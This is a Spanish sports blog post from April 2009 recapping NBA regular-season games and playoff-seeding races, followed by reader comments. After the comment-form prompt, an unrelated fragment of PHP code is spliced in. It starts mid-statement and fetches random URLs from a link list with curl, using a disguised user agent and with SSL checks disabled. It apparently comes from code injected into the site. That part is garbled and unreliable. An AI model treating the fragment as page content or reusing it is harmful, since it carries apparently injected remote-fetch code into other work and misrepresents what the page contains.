La Crónica (13/04/2009)

14 de April de 2009 por txusma

Esto se acaba. Mañana miércoles se jugarán los últimos partidos de una liga regular que mantiene la emoción hasta el último momento y es que a 2 dias del final aún tenemos interrogantes por desvelar.

El principal es el orden final (y por tanto los emparejamientos de primera ronda) del Oeste. De momento lo único que sabemos es que Denver ganará su división, asegurando la ventaja de campo en primera ronda, gracias a su victoria frente Sacramento con 45 puntos y 11 triples (récord de la franqucia) de JR Smith. Lástima de cabeza la suya. El resto de implicados en esa lucha por la 2ª posición también vencieron manteniendo la incógnita de qué equipos conseguirán la ventaja de campo. Houston venció a unos tristes Hornets de la mano de Yao Ming y Scola y se jugará las habichuelas frente a los Mavs; Portland apalizó a Oklahoma demostrando que llegan en buena forma a los Playoffs y asaltará la 3ª plaza en casa contra los Nuggets ; y finalmente los Spurs se impusieron con comodidad a los Warriors y ahora dependen de la derrota de Houston para mejorar su clasificación. Antes, deberán ganar a los Hornets. Todos estos partidos para el miércoles, así que preparad café. El Oeste se completó con la victoria de los Mavs frente los Wolves, con buzzer-beater de Jason Terry, la de los Suns frente a los Grizzlies y la de los Jazz frente a los Clippers. Dallas, New Orleans y Utah luchan por evitar la octava plaza y a los Lakers en primera ronda, sin duda el equipo más fuerte de la conferencia. Reitero: preparad café.

En el Este hay más cosas resueltas pero tampoco deja de resultar interesante. Los Cavaliers se aseguraron de una vez por todas el primer puesto de la regular y con él la ventaja de campo en todos los Playoffs, con una victoria frente a los Pacers. Sólo han perdido un partido en casa en la regular así que las estadísticas dicen que deberían ser campeones. Sus principales rivales en el Este no pasan un buen momento, especialmente Orlando que, con las bajas de Turkoglu y Lewis, decidió dar también descanso a Howard. Resultado: derrota frente a los Bucks. Chicago condenó a Detroit a la octava plaza (y a vérselas con Lebron) con su victoria en Auburn Hills. Además, con esta victoria los de la ciudad del viento adelantan a Philadelphia y se colocan sextos provisionalmente. De acabar así, veo a los Magic sudando la gota gorda para eliminarlos. En los partidos intrascendetes de la jornada victorias de Toronto “A buenas horas” Raptors y New Jersey Nets frente a Wizards y Bobcats, respectivamente.

PREMIOS

MVP: Partidazo de JR Smith y no hay mucho más que decir. 45 puntos y 11 triples, en ¡30 minutos!. Récord personal y de la franquicia respectivamente

Rookies: ¡Qué hornada! Brook Lopez anotó 18 puntos y recogió 20 rebotes, Derrick Rose lideró a los Bulls con 24 puntos, 5 rebotes y 8 asistencias, Anthony Randolph fue el mejor de los Warriors con 24 puntos y 16 rebotes… Incapaz de decidirme por uno sólo.

Sorpresa: Cuando Dwight Howard no juega aparece el polaco Marcin Gortat y no lo hace mal del todo. Ayer anotó 10 puntos y recogió 18 rebotes. En todo caso la sorpresa de la jornada es la todo un número 9 del draft, Ike Diogu, que disponiendo de 40 minutos por primera vez en mucho tiempo se fue para con 32 puntos y 11 rebotes.

Decepción: Horrible partido de los Hornets personalizado en Chris Paul, que demostró que es  humano y en una actuación muy floja tan solo anotó 9 puntos.

Esfuerzo en vano: A una asistencia se quedó Mike Miller del triple doble en la derrota de los Wolves frente los Mavs (18-10-9). Dándole el premio a Miller varíamos un poco porque el resto de candidatos son… Danny Granger y Caron Butler, como no.

Comenta

6 comentarios a esta entrada

  1. Hynreck dice:
    #1

    Quien creeis que debbe ser nombrado mejor sexto hombre esta temporada?
    Mi favorito sigue siendo Terry, pero las ultimas actuaciones de JR pueden abrir un poco la discusión.

      Citar

  2. TheDeerHunter dice:
    #2

    Pues, en efecto… creo que Jason Terry por regularidad y por lo básico que ha sido en la increíble remontada de Dallas (y lo que te rondaré en playoffs)

    JR Smith en Denver también fundamental… pero no tan regular. Eso creo que debería ser un criterio exigible para el premio del 6ºh

      Citar

  3. Noname dice:
    #3

    odom?

      Citar

  4. xapa_croack dice:
    #4

    PQ los portland no pueden asaltar la 2 plaza del oeste???

    En el global van 2-1 a favor de denver, pero si gana portland empataran a 2-2.

      Citar

  5. TheDeerHunter dice:
    #5

    Si no estoy confundido, Denver tiene más victorias de División y de Conferencia que Portland y, por lo tanto los Blazers quedan debajo en el empate. Lo mismo les pasa con respecto a Houston.
    Usease que a ganar por pelotas a Denver y rezar para que palme Houston… porque si pierden y ganan los Spurs, estos tendrían ventaja campo en primera ronda. Sólo les faltaría eso contra los de Popovic.

    Odom ha hecho una temporada, en líneas generales, decepcionante… dicen las malas lenguas (Daimiel) que sólo ha jugado bien a partir de su relación con cierta actriz afroamericana a fin de no tenerse que separar de ella al finalizar la temporada. Tiran más dos … que el propio contrato con los amarillos, por lo visto.

      Citar

  6. xapa_croack dice:
    #6

    gracias deer por la aclaración.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>